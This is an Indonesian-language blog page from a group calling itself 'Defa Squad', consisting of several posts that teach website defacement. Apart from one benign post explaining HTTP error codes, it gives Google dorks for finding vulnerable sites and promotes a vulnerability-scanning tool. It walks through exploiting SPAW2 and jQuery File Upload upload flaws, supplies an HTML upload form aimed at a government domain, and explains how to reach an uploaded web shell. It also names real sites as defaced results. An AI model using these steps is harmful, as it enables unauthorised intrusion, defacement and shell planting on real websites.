06/17/17 - Defa Squad

Defa Squad

Tempat Belajar Deface

Post Top Ad

Saturday, June 17, 2017

Tutorial Deface : Deface Onion.to File Upload

June 17, 2017 0
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb wkwkkw Mari kita Lanjut
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Dork : inurl:upload site:.onion.to
SS1

 Pilih File , Abis itu URL Bebas & Klik Upload Done
https://tt3j2x4k5ycaa5zt.onion.to/uploads/03-2017/x.html
https://danwin1210.me/uploads/03-2017/x.html
sudah paham ? jika belom masuk ke grup kami saja :)  -> Defa Squad
Read More
at No comments:

Tips : Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website

June 17, 2017 0

Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website
Pernahkan Kalian ? saat mengakses login admin (Site.com/admin/) tapi 403 ? saat menambahkan site.com/login.php Bisa ? tapi saat login mengakses site.com/admin/ ? Kok bisa gitu ? mari kita pelajari selengkapnya di sini :)

Error 401 : Unauthorized
Status 401 Unauthorized, menyatakan website tidak memiliki hak akses untuk folder yang diproteksi oleh password seperti saat login admin lalu muncul Authentication.

Error 403 : Forbidden
Status 403 Forbidden, menyatakan bahwa saat  mengakses ke folder tujuan. lalu muncul 403 disebabkan oleh kesalahan pengaturan hak akses pada folder.

Error 404 : Not Found
Status 404 Not Found, menyatakan  file atau folder yang diminta, tidak ditemukan didalam database pada suatu website.

Error 406 : Not Acceptable
Status 406 Not Acceptable, menyatakan  permintaan dari browser tidak dapat dipenuhi oleh server.

Error 500 : Internal Server Error
Status 500 Internal Server Error, menyatakan ada kesalahan konfigurasi pada akun hosting.

Error 503 : Service Unavaible
Status 503 Service Unavaible, menyatakan server situs web tidak tersedia sekarang. Sebagian besar waktu ini adalah karena server terlalu sibuk atau karena ada yang pemeliharaan yang dilakukan di atasnya.

Error 509 : Bandwidth Limit Exceeded
Status 509 Bandwidth Limit Exceeded, menyatakan bahwa penggunaan bandwidth pada account hosting sudah melebihi quota yang ditetapkan untuk akun hosting pemilik website.

Demikian dari saya , pada kode tersebut mohon maaf jika ada kesalahan ini kan mau masuk ramadhan jadi kita saling maaf-maafaan :) Like Fanspage Guys ^_^ di sebelah kanan :)

 sumber : familyattackcyber.blogspot.co.id,
Read More
at No comments:
Labels:

Tool : Gr3enox Exploit Scanner

June 17, 2017 0

Nah untuk kesempatan kali ini saya akan membagikan tool gr3enox untuk memudahkan anda dalam mencari target hacking dengan google dork

tool ini mampu mencari web yang memiliki kerentanan

  • simple sqli
  • Xss
  • Lfi
  • Lfi Fuzz
  • Rfi
dan adapun cara penggunaanya yaitu 
  1. pilih kerentanan yang ingin di cari ( daftar kerentanan yang tersedia liat di atas )
  2. isikan dork anda di kolom dork ( ingat hanya dork yang berhubungan dengan kerentanan diatas )
  3. pilih pages kalian ( disaarankan pilih pages 5 )
  4. search untuk memulai pencarian web yang rentan
  5. kalau udah selesai klick remove clone untuk menghapus url yang sama 
  6. start lagi untuk memulai penghapusan
  7. jika ada web yang vunl ( bisa di liat di bagian bawah berwarna merah ) click save to file 
  8. selesai :)
berminat ?
silahkan download di sini 

dan dapatkan juga tool deface lainnya hanya disini 
Read More
at No comments:
Labels:

Tutorial Deface : Cara Deface Website Melalui Spaw Uploads Vulnerability

June 17, 2017 1
MalaikatTersakiti Malam semua balik lagi dengan jaka sudah lama sekali jaka tidak pernah post karena jaka sedang sibuk di dunia nyata jadi belum sempat post artikel baru,Malam ini jaka akan membahas sebuah tutorial dari sebuah blog menurut jaka tutorial ini sangat bagus post kali ini 100% jaka copy karena jaka tidak ada waktu untuk ngetik balik jadi jika ada yang kurang jelas komen aja langsung aja ke TKP.
1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.mysite:jpsite:gov.cn etc asal jangan site:co.id yah !

 Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Sehingga Menjadi Seperti Ini :
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

4). Tekan Enter, Nanti akan Terbuka Seperti Ini :

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

7). Selanjutnya Klik Tombol Upload.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

9). Selesai, dan Hasilnya :

http://www.dtam.moph.go.th/
http://www.sieps.com.br/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.
Read More
at 1 comment:
Labels:

Tutorial Deface : [Update] Tutorial Deface Dengan Jquery File Upload full Tutorial 2017

June 17, 2017 0
Okee kali ini saya akan share tutorial Deface Method Jquery File File Upload

Alat Alat :

  • Default Google Dork :/assets/global/plugins/jquery-file-upload/ site:        *Kembangin lagi biar joss
  • Exploit: http://targetcrotz.com/assets/global/plugins/jquery-file-upload/server/php/ atau http://target/[patch]/assets/global/plugins/jquery-file-upload/server/php/
  • Script CSRF: Save dengan .html
<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</

  •  Shell : Pakek shell andalan kalian.. 
Langkah langkah:


  • Masukan dork di atas atau dork yang sudah ente kembangin,pilih target lalu masukan exploitnya,jika vuln maka ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablba}]
  • Masukan target anda ke script CSRF tadi
  • Upload shell anda jika berhasil ada tampilan seperti ini:

  • Akses shell ada di : http://targetcrotz.gov.my/assets/gobal/plugins/jquery-file-upload/server/php/files/namashellmu.php
Nih uploadanya yang saya tester tadi  :
Okee Sekian dari saya , semoga bermanfaat.. Terimakasih..
Read More
at No comments:
Labels:

Post Top Ad

Author Details